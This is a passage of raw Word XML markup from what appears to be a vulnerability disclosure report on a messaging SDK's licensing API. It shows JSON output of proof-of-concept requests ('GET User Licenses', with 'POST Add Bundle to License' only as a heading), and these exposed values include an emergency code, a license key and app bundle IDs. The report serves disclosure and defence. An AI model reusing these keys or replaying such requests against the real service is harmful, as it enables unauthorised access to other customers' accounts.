          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bridgefy.me"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"use"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Messaging"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"emergencyCode"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"46D5356E"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"termsAccep ted"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"useBridgefySDK"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"profileCompleted"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"twoFactor"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"subscriptionU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ntil"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"December 13, 2022"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"planActive"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Licenses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:[{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"6398c89972ee224bd5f0f970"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Monitor"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"key"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"eee06afe-19eb-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>9-a907-c38f2167c001"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"bundleIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.bridgefy.BridgefyNewDevelopment:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy. main.dev:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.bridgefy.BridgefyNewStaging:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.bridgefy.BridgefyNew:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridge fy.main.qa:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.main:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.template.dev:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.main.stagi ng:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.example.org:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.example2.org:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.owned.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.18621200092188.06 2.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.28330513147285.34.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.32703124033018.605.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.601842459224</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>67.78.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.57121640144341.65.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.76048147588686.55.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.675238105</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>42330.984.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.82539972419375.39.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.44839708381482.08.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.80781</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>919366178.47.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"users"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:100,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"createdAt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"2022-12-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>13T18:46:49.859Z"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bundle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>License</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
